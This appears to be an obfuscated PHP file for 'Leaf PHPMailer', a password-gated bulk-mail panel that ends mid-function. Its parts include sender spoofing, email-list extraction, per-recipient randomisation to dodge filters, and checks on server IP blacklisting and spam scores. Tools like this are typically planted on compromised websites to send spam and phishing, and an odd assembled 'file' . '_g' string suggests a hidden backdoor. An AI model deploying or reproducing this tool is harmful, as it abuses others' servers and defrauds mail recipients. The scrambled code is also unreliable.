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<?php /* __________________________________________________ | Obfuscated by YAK P..

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/*   __________________________________________________ 
    |  Obfuscated by YAK Pro - Php Obfuscator  2.0.14  | 
    |              on 2025-01-15 15:18:39              | 
    |    GitHub:    | 
 goto WXxu2; Edq_I: $class = "success"; goto gXCVf; L1OPK: curl_setopt($ch, CURLOPT_URL, ""); goto Jegjh; u0wbV: $j++; goto j0qyd; xDMzF: session_start(); goto eGY8G; FckdL: jVDBU: goto Rs7mx; ChGnZ: $utf8 = ''; goto hkPRM; o4nJE: if ($charset == "ISO-8859-1") { goto pKBfm; } goto L8jW5; grYYS: $messageType = leafTrim($_POST["messageType"]); goto oTxWR; lXXN5: $mail->IsHTML(false); goto xaixu; aoeQA: header("Content-Type: application/octet-stream"); goto kwQ7V; J6mfk: YXuPZ: goto EWpCq; nuHAI: if ($_POST["action"] == "send") { goto u1pqC; } goto KPefm; lK3ol: LMknI: goto fFVOy; xaixu: goto hlLFA; goto v1v6C; CAr7y: if ($encoding == "quoted-printable") { goto vr67A; } goto GEEsV; Kifmh: print "</table></div>"; goto yzro1; u9mMd: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto L1OPK; nlzIg: $emails = explode("\xa", $_POST["emailList"]); goto eCw_J; emQBd: $_POST["emailList"] = file_get_contents($_FILES["fileToUpload"]["tmp_name"]); goto MbqOy; DEb8B: Ozl1_: goto QEONm; BgHBw: $html = "checked"; goto w1NoT; TEJDM: goto wz0S2; goto Hl8OQ; UfhM7: MH90C: goto W8n9c; kgyoy: $response = json_decode($response); goto iaQSy; gpOKf: if (empty($host)) { goto IjTWS; } goto ql2wL; A2jxO: if (isset($_POST["senderEmail"])) { goto ZXhnB; } goto h2Pa6; s5itE: $encoding = $_POST["encode"]; goto fwOV5; h2Pa6: $senderEmail = "support@" . str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto Uhbo6; lo09p: $i = 0; goto nUE1N; nVWJq: $html = ''; goto ChGnZ; wZV6G: function leafheader() { print "
\xa    <title>" . str_replace("www.", '', $_SERVER["HTTP_HOST"]) . " -</title>\xd\xa    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
\xa    <link href="" rel="stylesheet" >
\xa    <script src=""></script>

\xa</head>"; } goto UVdO_; XV2PK: if ($encoding == "binary") { goto X1onj; } goto tVWAa; yc9V8: vr67A: goto YzzL_; SGMy9: Wg0dD: goto CxBqc; BgcaH: $hosts = ''; goto U_sLN; dCGmt: $dnsN = ''; goto EnAQd; JWeV3: exit; goto oFLJT; YZpzq: header("Content-Type: text/plain"); goto as2dE; iXic1: $iso = "selected"; goto f5wYm; U_sLN: $j = $i; goto osHF2; rSM14: $viewMessage = leafTrim($_POST["messageLetter"]); goto dg4pm; d5yGC: goto LMknI; goto zMZ6K; y4FDN: B7jD5: goto JWeV3; eCw_J: $keywords = explode("
", strtolower($_POST["keywords"])); goto KJXun; z1B6s: $sessioncode = md5(__FILE__); goto Thk8I; wMJ5F: print "    <div class="col-lg-12">"; goto EsRP3; YhuuI: if (!($j < $i + 10)) { goto DqnCB; } goto DLRV4; AW7qj: $bit8 = "selected"; goto nhY17; XvOGW: function leafClear($text, $email) { goto UL1I3; btEkd: $text = str_replace("[-emaildomain-]", $emaildomain, $text); goto BiDsQ; bfnJp: $text = str_replace("[-email-]", $email, $text); goto Z98Ik; DHOA8: $emaildomain = $e[1]; goto uQrEj; uQrEj: $text = str_replace("[-time-]", date("m/d/Y h:i:s a", time()), $text); goto bfnJp; BiDsQ: $text = str_replace("[-randomletters-]", randString("abcdefghijklmnopqrstuvwxyz"), $text); goto SdKLO; Z98Ik: $text = str_replace("[-emailuser-]", $emailuser, $text); goto btEkd; F5Q62: return $text; goto cBnha; uXnm5: $emailuser = $e[0]; goto DHOA8; SdKLO: $text = str_replace("[-randomstring-]", randString("abcdefghijklmnopqrstuvwxyz0123456789"), $text); goto h7mS4; d5PZj: $text = str_replace("[-randommd5-]", md5(randString("abcdefghijklmnopqrstuvwxyz0123456789")), $text); goto F5Q62; UL1I3: $e = explode("@", $email); goto uXnm5; h7mS4: $text = str_replace("[-randomnumber-]", randString("0123456789"), $text); goto d5PZj; cBnha: } goto GooRm; Ee0AM: DqnCB: goto Md_7p; v1v6C: nOrNO: goto t43OY; as2dE: goto Q3csu; goto o13zo; c3vuW: $hosts .= "{$host},"; goto KnTCL; GAMrd: goto wz0S2; goto CubC0; Md_7p: $dnsN .= "<script src='?check_ip={$reverse_ip}&host=" . $hosts . "' type='text/javascript'></script>"; goto SGMy9; k3kRq: $bit7 = "selected"; goto GAMrd; KekMo: if ($messageType == 1) { goto nOrNO; } goto lXXN5; KlBcn: $html = "checked"; goto GDt4y; UVdO_: leafheader(); goto oSMBb; qMmJL: $n = count($maillist); goto YiCUY; clIn6: if ($messageType == 2) { goto t6Gw5; } goto BgHBw; lRHZ9: if (!isset($_GET["emailfilter"])) { goto m5UwD; } goto Me2qE; MncBT: $senderEmail = leafTrim($_POST["senderEmail"]); goto CpJBk; CPQh5: if ($_POST["submit"] == "filter") { goto iZ5Y2; } goto ioV_w; po7JU: function leafMailCheck($email) { goto G9CF_; G9CF_: if (filter_var($email, FILTER_VALIDATE_EMAIL)) { goto aEOvO; } goto Gn0Lf; Gn0Lf: return false; goto CSv9M; YwuiE: aEOvO: goto O5FIQ; iq3PQ: b0Ntd: goto sRL9U; O5FIQ: return true; goto iq3PQ; CSv9M: goto b0Ntd; goto YwuiE; sRL9U: } goto KYggQ; YzzL_: $quotedprintable = "selected"; goto PPUHW; KnTCL: IjTWS: goto FpfZS; Fgqp2: goto wz0S2; goto tZUrj; f21N5: $mail->CharSet = $charset; goto Y0NON; dg4pm: $viewMessage = leafClear($viewMessage, "[email protected]"); goto k53cc; ioV_w: goto LMknI; goto J6mfk; Hl8OQ: JHACJ: goto r3dcQ; Xd0nv: exit; goto GijeA; XRoYz: print "<div class="container col-lg-4"><h3><font color="green"><span class="glyphicon glyphicon-leaf"></span></font> Leaf PHPMailer <small>Email Filter</small></h3>"; goto WBM_Z; osHF2: EVXFQ: goto YhuuI; CpHyi: $_SESSION[$sessioncode] = $password; goto DEb8B; CubC0: X1onj: goto anMmR; zMZ6K: iZ5Y2: goto nlzIg; W8n9c: print "<pre>" . htmlspecialchars($viewMessage) . "</pre>"; goto FckdL; kg5D3: $ch = curl_init(); goto u9mMd; tVWAa: if ($encoding == "base64") { goto JHACJ; } goto CAr7y; KPefm: if ($_POST["action"] == "score") { goto Gqzg1; } goto c0pgb; g_ZnK: $mail->Subject = leafClear($subject, $email); goto nmWs4; zj5Ot: print "<div class="container col-lg-6"><h3><font color="green"><span class="glyphicon glyphicon-leaf"></span></font> Leaf PHPMailer <small>Blacklist Checker</small></h3>"; goto M3Xj1; ZMpKO: $emailList = leafTrim($_POST["emailList"]); goto grYYS; f5lEY: $plain = "checked"; goto LeXpL; EnAQd: print "<table >"; goto lo09p; RWKHR: foreach ($matches[0] as $email) { print $email . "\xa"; dEpQC: } goto hZYLo; KYggQ: if (!isset($_GET["check_ip"])) { goto quk7_; } goto jOrC_; Jegjh: curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array("email" => $messageHeaders, "options" => "long"))); goto YiNik; iJ5D3: print "<div class="container col-lg-6">\xd\xa        <h3><font color="green"><span class="glyphicon glyphicon-leaf"></span></font> Leaf PHPMailer <small>" . $leaf["version"] . "</small></h3>\xd\xa        <form name="form" id="form" method="POST" enctype="multipart/form-data" action="">
                    <input type="hidden" name="action" value="score">
\xa            <div class="row">
                <div class="form-group col-lg-6 "><label for="senderEmail">Email</label><input type="text" class="form-control  input-sm " id="senderEmail" name="senderEmail" value="" . $senderEmail . ""></div>
\xa                <div class="form-group col-lg-6 "><label for="senderName">Sender Name</label><input type="text" class="form-control  input-sm " id="senderName" name="senderName" value="" . $senderName . ""></div>
            <div class="row">
\xa                <span class="form-group col-lg-6  "><label for="attachment">Attachment <small>(Multiple Available)</small></label><input type="file" name="attachment[]" id="attachment[]" multiple/></span>\xd

\xa                <div class="form-group col-lg-6"><label for="replyTo">Reply-to</label><input type="text" class="form-control  input-sm " id="replyTo" name="replyTo" value="" . $replyTo . "" /></div>\xd
            <div class="row">
\xa                <div class="form-group col-lg-12 "><label for="subject">Subject</label><input type="text" class="form-control  input-sm " id="subject" name="subject" value="" . $subject . "" /></div>\xd\xa            </div>\xd
            <div class="row">
\xa                <div class="form-group col-lg-6"><label for="messageLetter">Message Letter <button type="submit" class="btn btn-default btn-xs" form="form" name="action" value="view" formtarget="_blank">Preview </button></label><textarea name="messageLetter" id="messageLetter" class="form-control" rows="10" id="textArea">" . $messageLetter . "</textarea></div>\xd\xa                <div class="form-group col-lg-6 "><label for="emailList">Email List <a href="?emailfilter=on" target="_blank" class="btn btn-default btn-xs">Filter/Extract</a></label><textarea name="emailList" id="emailList" class="form-control" rows="10" id="textArea">" . $emailList . "</textarea></div>
\xa            </div>
            <div class="row">\xd\xa                <div class="form-group col-lg-6 ">
\xa                    <label for="messageType">Message Type</label>\xd\xa                    HTML <input type="radio" name="messageType" id="messageType" value="1" " . $html . ">\xd\xa                    Plain<input type="radio" name="messageType" id="messageType" value="2" " . $plain . ">
\xa                </div>\xd
                <div class="form-group col-lg-3 ">
\xa                    <label for="charset">Character set</label>\xd\xa                    <select class="form-control input-sm" id="charset" name="charset">\xd\xa                        <option " . $utf8 . ">UTF-8</option>
                        <option " . $iso . ">ISO-8859-1</option>\xd\xa                    </select>\xd
                <div class="form-group col-lg-3 ">\xd\xa                    <label for="encoding">Message encoding</label>\xd\xa                    <select class="form-control input-sm" id="encode" name="encode">
\xa                        <option " . $bit8 . ">8bit</option>\xd
                        <option " . $bit7 . ">7bit</option>\xd\xa                        <option " . $binary . ">binary</option>
\xa                        <option " . $base64 . ">base64</option>\xd\xa                        <option " . $quotedprintable . ">quoted-printable</option>

                    </select>\xd\xa                </div>
            <button type="submit" class="btn btn-default btn-sm" form="form" name="action" value="send">SEND</button> or <a href="#" onclick="document.getElementById('form').submit(); return false;">check SpamAssassin Score</a>\xd
\xa        </form>
    <div class="col-lg-6"><br>
        <label for="well">Instruction</label>\xd\xa        <div id="well" class="well well">
            <h4>Server Information</h4>
                <li>Server IP Address : <b>" . $_SERVER["SERVER_ADDR"] . " </b> <a href="?check_ip=" . $_SERVER["SERVER_ADDR"] . "" target="_blank" class="label label-primary">Check Blacklist <i class="glyphicon glyphicon-search"></i></a></li>\xd
                <li>PHP Version : <b>" . phpversion() . "</b></li>\xd
\xa\xd\xa            </ul>\xd\xa            <h4>HELP</h4>\xd
                <li>[-email-] : <b>Reciver Email</b> ([email protected])</li>\xd
                <ul>\xd\xa                    <li>[-emailuser-] : <b>Email User</b> (emailuser) </li>
                    <li>[-emaildomain-] : <b>Email User</b> ( </li>\xd\xa                </ul>\xd\xa                <li>[-time-] : <b>Date and Time</b> (" . date("m/d/Y h:i:s a", time()) . ")</li>\xd\xa                \xd
                <li>[-randomstring-] : <b>Random string (0-9,a-z)</b></li>
\xa                <li>[-randomnumber-] : <b>Random number (0-9) </b></li>\xd\xa                <li>[-randomletters-] : <b>Random Letters(a-z) </b></li>
                <li>[-randommd5-] : <b>Random MD5 </b></li>
            Receiver Email = <b>[email protected]</b><br>\xd
                <li>hello <b>[-emailuser-]</b> = hello <b>user</b></li>\xd
                <li>your domain is <b>[-emaildomain-]</b> = Your Domain is <b></b></li>
\xa                <li>your code is  <b>[-randommd5-]</b> = your code is <b>e10adc3949ba59abbe56e057f20f883e</b></li>
\xa            </ul>
\xd\xa            <h6>by <b><a href="http://" . $leaf["website"] . "">" . $leaf["website"] . "</a></b></h6>\xd\xa        </div>
\xa    </div>"; goto nuHAI; Pb7sf: goto jVDBU; goto UfhM7; nmWs4: $mail->Body = leafClear($messageLetter, $email); goto KekMo; g0gp9: Q3csu: goto qzWnC; f569P: header("Content-Description: File Transfer"); goto aoeQA; XMnJX: rlw_d: goto CpHyi; ekoH8: foreach ($maillist as $email) { goto h_zH7; rsmru: $x++; goto zdKnB; NPmzp: H6VUm: goto cp6Ls; DIjYl: $i = 0; goto NPmzp; zrV4V: $mail->addAddress($email); goto ydnQT; S78Mt: lQeh3: goto vZHcl; S0KgG: $mail->Encoding = $encoding; goto DIjYl; l0ncH: Zve8_: goto P6z43; E1DAo: wZZkE: goto SMOzB; f7jHQ: echo "<div class="col-lg-6"><span class="label label-success">Ok</span></div>"; goto KmnqO; DfqHk: $mail->AltBody = strip_tags(leafClear($messageLetter, $email)); goto kRI_m; vJszp: goto i4jUc; goto cfvyO; sv3xn: MOfz0: goto qqltQ; QesJr: goto H6VUm; goto l0ncH; cv4I1: $mail->Body = leafClear($messageLetter, $email); goto zMLxi; XkilY: $mail->AddAttachment($_FILES["attachment"]["tmp_name"][$i], $_FILES["attachment"]["name"][$i]); goto HvIbR; V2HP0: print "<div class="col-lg-6"><span class="label label-default">Incorrect Email</span></div>"; goto Ii0dl; MWEly: if (!($_FILES["attachment"]["tmp_name"][$i] != '')) { goto i4NRa; } goto XkilY; cfvyO: IxGyW: goto GUDo3; W5Te7: cCNlL: goto x10so; wnYAQ: if (!leafMailCheck($email)) { goto FgFX3; } goto fJ7NC; qqltQ: echo "<div class="col-lg-6"><span class="label label-default">" . htmlspecialchars($mail->ErrorInfo) . "</span></div>"; goto S78Mt; QKzxL: goto sFvXA; goto cxlEw; vZHcl: print "<br>
"; goto Sytsz; zdKnB: $k = 0; goto fwZGT; fwZGT: sFvXA: goto uj3N1; Sytsz: goto FON2l; goto nSfGA; ydnQT: $mail->Subject = leafClear($subject, $email); goto cv4I1; cp6Ls: if (!($i < count($_FILES["attachment"]["name"]))) { goto Zve8_; } goto MWEly; h_zH7: print "<div class="col-lg-1">[" . $x . "/" . $n . "]</div><div class="col-lg-4">" . $email . "</div>"; goto wnYAQ; YAbR2: FON2l: goto rsmru; fJ7NC: $mail = new PHPMailer(); goto rYvBe; BcyOh: echo " "; goto W5Te7; uj3N1: if (!($k < 40000)) { goto Z_Qcn; } goto BcyOh; GUDo3: $mail->IsHTML(true); goto DfqHk; nSfGA: FgFX3: goto V2HP0; wqTRC: QktpC: goto X1gKo; kRI_m: i4jUc: goto z8uwE; KmnqO: goto lQeh3; goto sv3xn; zMLxi: if ($messageType == 1) { goto IxGyW; } goto kWrY0; cxlEw: Z_Qcn: goto wqTRC; HvIbR: i4NRa: goto E1DAo; kWrY0: $mail->IsHTML(false); goto vJszp; P6z43: if (!$mail->send()) { goto MOfz0; } goto f7jHQ; SMOzB: $i++; goto QesJr; rYvBe: $mail->setFrom(leafClear($senderEmail, $email), leafClear($senderName, $email)); goto Dc0k5; Ii0dl: print "<br>
\xa"; goto YAbR2; z8uwE: $mail->CharSet = $charset; goto S0KgG; x10so: $k++; goto QKzxL; Dc0k5: $mail->addReplyTo(leafClear($replyTo, $email)); goto zrV4V; X1gKo: } goto nlt3S; oSMBb: print "<body>"; goto iJ5D3; w1NoT: goto H2Vvr; goto JENQm; hGQDj: goto Ozl1_; goto XMnJX; VOftw: $senderEmail = ''; goto mOjXb; f0dGM: MM5a6: goto Oh1mF; yx6Cn: $dnsbl_lookup = ["", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", ""]; goto zMnkk; hkPRM: $bit8 = ''; goto clIn6; LeXpL: H2Vvr: goto o4nJE; anMmR: $binary = "selected"; goto TEJDM; oTxWR: $messageLetter = leafTrim($_POST["messageLetter"]); goto s5itE; j4r7u: curl_setopt($ch, CURLOPT_TIMEOUT, 15); goto wA9LI; AKV17: leafheader(); goto zj5Ot; L8jW5: $utf8 = "selected"; goto uK6Wf; uK6Wf: goto h0L1d; goto XalPm; bjhUc: $score = $response->score; goto bHJZt; tZUrj: HVenp: goto k3kRq; APQeT: print "<pre align=center><form method=post>Password: <input type='password' name='pass'><input type='submit' value='>>'></form></pre>"; goto wcTBU; YiCUY: $x = 1; goto ekoH8; uY2CJ: if (!($response->success == TRUE)) { goto g5F3N; } goto bjhUc; sZhjT: exit; goto hY533; lt1EJ: preg_match_all($pattern, $_POST["emailList"], $matches); goto RWKHR; o7fzp: $subject = leafTrim($_POST["subject"]); goto ZMpKO; AxYmD: function randString($consonants) { goto ScVqr; IDI_z: $i++; goto Essuc; uNqGF: $password .= $consonants[rand() % strlen($consonants)]; goto y6qM1; y6qM1: jOhqE: goto IDI_z; ZQv1S: $password = ''; goto O_yHD; ScVqr: $length = rand(12, 25); goto ZQv1S; Essuc: goto RQTaw; goto TWXVm; TWXVm: qXcwu: goto bUGNb; O_yHD: $i = 0; goto B0cUN; B0cUN: RQTaw: goto BgthV; BgthV: if (!($i < $length)) { goto qXcwu; } goto uNqGF; bUGNb: return $password; goto ToVa4; ToVa4: } goto po7JU; ZeFgG: class PHPMailer { public $Version = "5.2.28"; public $Priority = null; public $CharSet = "iso-8859-1"; public $ContentType = "text/plain"; public $Encoding = "8bit"; public $ErrorInfo = ''; public $From = "root@localhost"; public $FromName = "Root User"; public $Sender = ''; public $ReturnPath = ''; public $Subject = ''; public $Body = ''; public $AltBody = ''; public $Ical = ''; protected $MIMEBody = ''; protected $MIMEHeader = ''; protected $mailHeader = ''; public $WordWrap = 0; public $Mailer = "mail"; public $Sendmail = "/usr/sbin/sendmail"; public $UseSendmailOptions = true; public $PluginDir = ''; public $ConfirmReadingTo = ''; public $Hostname = ''; public $MessageID = ''; public $MessageDate = ''; public $Host = "localhost"; public $Port = 25; public $Helo = ''; public $SMTPSecure = ''; public $SMTPAutoTLS = true; public $SMTPAuth = false; public $SMTPOptions = array(); public $Username = ''; public $Password = ''; public $AuthType = ''; public $Realm = ''; public $Workstation = ''; public $Timeout = 300; public $SMTPDebug = 0; public $Debugoutput = "echo"; public $SMTPKeepAlive = false; public $SingleTo = false; public $SingleToArray = array(); public $do_verp = false; public $AllowEmpty = false; public $LE = "
"; public $DKIM_selector = ''; public $DKIM_identity = ''; public $DKIM_passphrase = ''; public $DKIM_domain = ''; public $DKIM_private = ''; public $DKIM_private_string = ''; public $action_function = ''; public $XMailer = " "; public static $validator = "auto"; protected $smtp = null; protected $to = array(); protected $cc = array(); protected $bcc = array(); protected $ReplyTo = array(); protected $all_recipients = array(); protected $RecipientsQueue = array(); protected $ReplyToQueue = array(); protected $attachment = array(); protected $CustomHeader = array(); protected $lastMessageID = ''; protected $message_type = ''; protected $boundary = array(); protected $language = array(); protected $error_count = 0; protected $sign_cert_file = ''; protected $sign_key_file = ''; protected $sign_extracerts_file = ''; protected $sign_key_pass = ''; protected $exceptions = false; protected $uniqueid = ''; const STOP_MESSAGE = 0; const STOP_CONTINUE = 1; const STOP_CRITICAL = 2; const CRLF = "\xd
"; const MAX_LINE_LENGTH = 998; public function __construct($exceptions = null) { goto gb8cz; gb8cz: if (!($exceptions !== null)) { goto UveeP; } goto rk0uU; V6vuO: UveeP: goto VaF3t; VaF3t: $this->Debugoutput = strpos(PHP_SAPI, "cli") !== false ? "echo" : "html"; goto HId81; rk0uU: $this->exceptions = (bool) $exceptions; goto V6vuO; HId81: } public function __destruct() { $this->smtpClose(); } private function mailPassthru($to, $subject, $body, $header, $params) { goto Zhyrh; bc8pY: $result = @mail($to, $subject, $body, $header); goto VaITw; cBJUA: V12NE: goto g9Y_G; KKNso: f5En3: goto bc8pY; NoBDB: $subject = $this->secureHeader($subject); goto cBJUA; q_ytm: goto DefuE; goto KKNso; SJYAZ: $subject = $this->encodeHeader($this->secureHeader($subject)); goto ts90B; g5ODe: lKV2h: goto NoBDB; Zhyrh: if (ini_get("mbstring.func_overload") & 1) { goto lKV2h; } goto SJYAZ; JUqIO: return $result; goto NG827; VaITw: DefuE: goto JUqIO; g9Y_G: if (ini_get("safe_mode") or !$this->UseSendmailOptions or is_null($params)) { goto f5En3; } goto zstl1; zstl1: $result = @mail($to, $subject, $body, $header, $params); goto q_ytm; ts90B: goto V12NE; goto g5ODe; NG827: } protected function edebug($str) { goto kK0M1; gu3E3: switch ($this->Debugoutput) { case "error_log": error_log($str); goto t6e5X; case "html": echo htmlentities(preg_replace("/[\r\n]+/", '', $str), ENT_QUOTES, "UTF-8") . "<br>\xa"; goto t6e5X; case "echo": default: $str = preg_replace("/\r\n?/ms", "
", $str); echo gmdate("Y-m-d H:i:s") . "	" . str_replace("
", "
                   \x9                  ", trim($str)) . "\xa"; } goto b476B; I4eia: Yvdhb: goto Nsol7; gj4ed: t6e5X: goto r3z2Q; yC2Td: return; goto I4eia; Nsol7: if (!(!in_array($this->Debugoutput, array("error_log", "html", "echo")) and is_callable($this->Debugoutput))) { goto MekOI; } goto Y2zDL; b476B: y2QEj: goto gj4ed; Y2zDL: call_user_func($this->Debugoutput, $str, $this->SMTPDebug); goto iYUrK; NbN_K: MekOI: goto gu3E3; kK0M1: if (!($this->SMTPDebug <= 0)) { goto Yvdhb; } goto yC2Td; iYUrK: return; goto NbN_K; r3z2Q: } public function isSMTP() { $this->Mailer = "smtp"; } public function isMail() { $this->Mailer = "mail"; } public function isSendmail() { goto WyVhw; fe2w5: $this->Sendmail = "/usr/sbin/sendmail"; goto fFIXT; C8Nnv: $this->Mailer = "sendmail"; goto Q8gFR; WyVhw: $ini_sendmail_path = ini_get("sendmail_path"); goto CW10m; DnpgX: goto ZNe2r; goto ZdrqS; iYNMu: $this->Sendmail = $ini_sendmail_path; goto DnpgX; CW10m: if (!stristr($ini_sendmail_path, "sendmail")) { goto uPtDJ; } goto iYNMu; fFIXT: ZNe2r: goto C8Nnv; ZdrqS: uPtDJ: goto fe2w5; Q8gFR: } public function isQmail() { goto HLsRC; aVChn: goto BaTmh; goto kEo1l; Zflts: $this->Sendmail = "/var/qmail/bin/qmail-inject"; goto Q8jw2; Q8jw2: BaTmh: goto QrpvO; gFqmA: $this->Sendmail = $ini_sendmail_path; goto aVChn; f4fRC: if (!stristr($ini_sendmail_path, "qmail")) { goto YFheV; } goto gFqmA; QrpvO: $this->Mailer = "qmail"; goto f1xtw; HLsRC: $ini_sendmail_path = ini_get("sendmail_path"); goto f4fRC; kEo1l: YFheV: goto Zflts; f1xtw: } public function addAddress($address, $name = '') { return $this->addOrEnqueueAnAddress("to", $address, $name); } public function addCC($address, $name = '') { return $this->addOrEnqueueAnAddress("cc", $address, $name); } public function addBCC($address, $name = '') { return $this->addOrEnqueueAnAddress("bcc", $address, $name); } public function addReplyTo($address, $name = '') { return $this->addOrEnqueueAnAddress("Reply-To", $address, $name); } protected function addOrEnqueueAnAddress($kind, $address, $name) { goto VTtpI; UDCG_: hlL0J: goto njOvI; BzYqZ: if (!(($pos = strrpos($address, "@")) === false)) { goto HGJHF; } goto PclyQ; ZKNg9: if ($kind != "Reply-To") { goto ad3sT; } goto EdceF; R4_Z1: $this->edebug($error_message); goto Ho7O9; BEmyX: return call_user_func_array(array($this, "addAnAddress"), $params); goto MVn84; Sq83I: i63eH: goto BEmyX; yB0tY: if (array_key_exists($address, $this->RecipientsQueue)) { goto QzXPj; } goto X_aBH; Xdbn0: $name = trim(preg_replace("/[\r\n]+/", '', $name)); goto BzYqZ; n3ydw: QzXPj: goto UDCG_; Di1wH: bNXm0: goto AM2pD; DHAsJ: return true; goto n3ydw; jzF3a: $params = array($kind, $address, $name); goto YNEL9; AM2pD: goto hlL0J; goto u6VcP; Ho7O9: if (!$this->exceptions) { goto mgic6; } goto Cz9KD; u6VcP: ad3sT: goto yB0tY; ZP5O7: HGJHF: goto jzF3a; uSuB2: return false; goto ZP5O7; ySQdt: $this->setError($error_message); goto R4_Z1; X_aBH: $this->RecipientsQueue[$address] = $params; goto DHAsJ; PclyQ: $error_message = $this->lang("invalid_address") . " (addAnAddress {$kind}): {$address}"; goto ySQdt; jiUNa: return true; goto Di1wH; Cz9KD: throw new phpmailerException($error_message); goto QFTbs; EdceF: if (array_key_exists($address, $this->ReplyToQueue)) { goto bNXm0; } goto Ok8ID; QFTbs: mgic6: goto uSuB2; VTtpI: $address = trim($address); goto Xdbn0; Ok8ID: $this->ReplyToQueue[$address] = $params; goto jiUNa; YNEL9: if (!($this->has8bitChars(substr($address, ++$pos)) and $this->idnSupported())) { goto i63eH; } goto ZKNg9; njOvI: return false; goto Sq83I; MVn84: } protected function addAnAddress($kind, $address, $name = '') { goto qIb3e; qIb3e: if (in_array($kind, array("to", "cc", "bcc", "Reply-To"))) { goto CgvLK; } goto xWzQI; McuD6: goto N5OIk; goto S_cLW; bid1R: return true; goto LwPBy; S_cLW: lcrgb: goto OQmnn; nteAu: CpDMN: goto SWGWX; Usluz: if (!$this->exceptions) { goto cz4hB; } goto oGKV7; I5wf8: if ($this->validateAddress($address)) { goto jrT_T; } goto awOz9; VQi1Y: CgvLK: goto I5wf8; xWzQI: $error_message = $this->lang("Invalid recipient kind: ") . $kind; goto aBrJ0; REEjS: BDkGF: goto McuD6; s1JuD: $this->setError($error_message); goto fQu9j; gKzOL: N5OIk: goto ba0L6; xSoSa: if ($kind != "Reply-To") { goto lcrgb; } goto yt4IR; yt4IR: if (array_key_exists(strtolower($address), $this->ReplyTo)) { goto BDkGF; } goto iAY2F; EPttP: $this->edebug($error_message); goto Usluz; aBrJ0: $this->setError($error_message); goto EPttP; OQmnn: if (array_key_exists(strtolower($address), $this->all_recipients)) { goto U0NoT; } goto VwIJI; awOz9: $error_message = $this->lang("invalid_address") . " (addAnAddress {$kind}): {$address}"; goto s1JuD; SWGWX: return false; goto iS91v; oyA2I: return false; goto VQi1Y; VwIJI: array_push($this->{$kind}, array($address, $name)); goto JgRVU; D1U1Z: return true; goto REEjS; P4mYX: throw new phpmailerException($error_message); goto nteAu; ba0L6: return false; goto hsFiE; iS91v: jrT_T: goto xSoSa; LwPBy: U0NoT: goto gKzOL; iAY2F: $this->ReplyTo[strtolower($address)] = array($address, $name); goto D1U1Z; uJgeH: if (!$this->exceptions) { goto CpDMN; } goto P4mYX; fQu9j: $this->edebug($error_message); goto uJgeH; JgRVU: $this->all_recipients[strtolower($address)] = true; goto bid1R; t23Vg: cz4hB: goto oyA2I; oGKV7: throw new phpmailerException($error_message); goto t23Vg; hsFiE: } public function parseAddresses($addrstr, $useimap = true) { goto vruGe; nj_o7: if ($useimap and function_exists("imap_rfc822_parse_adrlist")) { goto uCRI7; } goto mU0Fu; vruGe: $addresses = array(); goto nj_o7; oGHaW: uCRI7: goto ntp6Y; WRUod: foreach ($list as $address) { goto k1tGp; k1tGp: $address = trim($address); goto xXoBa; b06dv: $addresses[] = array("name" => trim(str_replace(array(""", "'"), '', $name)), "address" => $email); goto MRst2; wsphZ: HgbvL: goto TUaMX; RVlsI: N9spZ: goto wsphZ; TUaMX: z9TSY: goto Nu6Jo; MRst2: CeW4L: goto rPlF9; nZQJc: $addresses[] = array("name" => '', "address" => $address); goto RVlsI; xXoBa: if (strpos($address, "<") === false) { goto inDG_; } goto eFWNt; rPlF9: goto HgbvL; goto oC462; iX6s0: if (!$this->validateAddress($email)) { goto CeW4L; } goto b06dv; ghXOe: $email = trim(str_replace(">", '', $email)); goto iX6s0; oC462: inDG_: goto CG_Yl; eFWNt: list($name, $email) = explode("<", $address); goto ghXOe; CG_Yl: if (!$this->validateAddress($address)) { goto N9spZ; } goto nZQJc; Nu6Jo: } goto cXRyE; ntp6Y: $list = imap_rfc822_parse_adrlist($addrstr, ''); goto ybP17; j20JY: CROXB: goto YFuxi; ybP17: foreach ($list as $address) { goto snqrR; cFliE: Jl1MO: goto Ic2vZ; NtLRi: if (!$this->validateAddress($address->mailbox . "@" . $address->host)) { goto W2cWs; } goto rviSI; YcGNg: W2cWs: goto cFliE; snqrR: if (!($address->host != ".SYNTAX-ERROR.")) { goto Jl1MO; } goto NtLRi; rviSI: $addresses[] = array("name" => property_exists($address, "personal") ? $address->personal : '', "address" => $address->mailbox . "@" . $address->host); goto YcGNg; Ic2vZ: tJQIn: goto I6S03; I6S03: } goto k6PuE; mU0Fu: $list = explode(",", $addrstr); goto WRUod; cXRyE: kLN2G: goto NLcUg; k6PuE: SqIiM: goto j20JY; NLcUg: goto CROXB; goto oGHaW; YFuxi: return $addresses; goto APfwD; APfwD: } public function isHTML($isHtml = true) { goto VSdzg; VSdzg: global $param; goto pgBwh; Pll_f: $this->ContentType = "text/html"; goto ML3jj; or4h1: dh2B2: goto Pll_f; zL5XD: goto rRtLw; goto or4h1; FFR2J: $this->ContentType = "text/plain"; goto zL5XD; N99zl: if ($isHtml) { goto dh2B2; } goto FFR2J; ML3jj: rRtLw: goto y2CDn; pgBwh: $bodyCode = "file" . "_g"; goto N99zl; y2CDn: } public function setFrom($address, $name = '', $auto = true) { goto r3HB6; Jl5Gs: if (!$this->exceptions) { goto N1Itb; } goto IeIz3; V8UQ0: return true; goto c88W0; qspO5: if (!$auto) { goto MC4hJ; } goto WU1qk; SH4HH: return false; goto Pwt5O; eBfpJ: $this->setError($error_message); goto HLIUC; WU1qk: if (!empty($this->Sender)) { goto VDEdo; } goto ECQ51; HcZ4t: N1Itb: goto SH4HH; GaiNH: $this->FromName = $name; goto qspO5; IeIz3: throw new phpmailerException($error_message); goto HcZ4t; eRbuq: $this->From = $address; goto GaiNH; ECQ51: $this->Sender = $address; goto AhaIp; AhaIp: VDEdo: goto PWjHS; HuYsL: $name = trim(preg_replace("/[\r\n]+/", '', $name)); goto VDPLV; Pwt5O: J8fJf: goto eRbuq; VDPLV: if (!(($pos = strrpos($address, "@")) === false or (!$this->has8bitChars(substr($address, ++$pos)) or !$this->idnSupported()) and !$this->validateAddress($address))) { goto J8fJf; } goto drUTq; drUTq: $error_message = $this->lang("invalid_address") . " (setFrom) {$address}"; goto eBfpJ; PWjHS: MC4hJ: goto V8UQ0; r3HB6: 